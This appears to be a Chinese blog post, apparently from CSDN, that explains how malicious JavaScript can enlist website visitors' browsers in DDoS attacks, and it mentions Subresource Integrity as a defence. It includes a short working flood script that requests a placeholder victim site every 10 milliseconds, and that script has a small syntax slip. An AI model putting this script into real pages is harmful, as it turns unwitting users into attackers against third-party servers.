最古老、最普遍、却又最可怕的攻击非DDoS攻击莫属。
在传统的DDoS攻击中,攻击者会控制大量的傀儡机,然后向目标服务器发送大量请求,阻止合法用户访问网站。
然而,最近几年DDoS攻击技术不断推陈出新:攻击者用一种新型且很有趣的方式欺骗用户参与到攻击活动中:使用恶意的JavaScript欺骗用户参与DDoS攻击。
基于JavaScript的DDOS攻击有一个非比寻常的特点:任何有浏览器的设备都可能参与攻击,其潜在攻击规模接近无限。基于JavaScript的DDOS攻击原理
现代网站的交互作用大多数都是采用JavaScript。JavaScript脚本可直接注入HTML中,或者通过 <script src=""> HTML从远程服务器载入。
function imgflood() {
var TARGET = ''victim-website.com'
var URI = '/index.php?'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
该脚本会在目标网页上生成一个图片按钮
ddos攻击源码_简单又可怕!基于JavaScript(JS)的DDOS攻击
最新推荐文章于 2024-08-10 00:37:48 发布
本文介绍了基于JavaScript的DDoS攻击,这种攻击利用恶意JS脚本使访问者无意中参与攻击。攻击者通过混淆代码隐藏攻击行为,而子资源完整性(SRI)是一种可能的防御手段,但目前并非所有浏览器都支持。
摘要由CSDN通过智能技术生成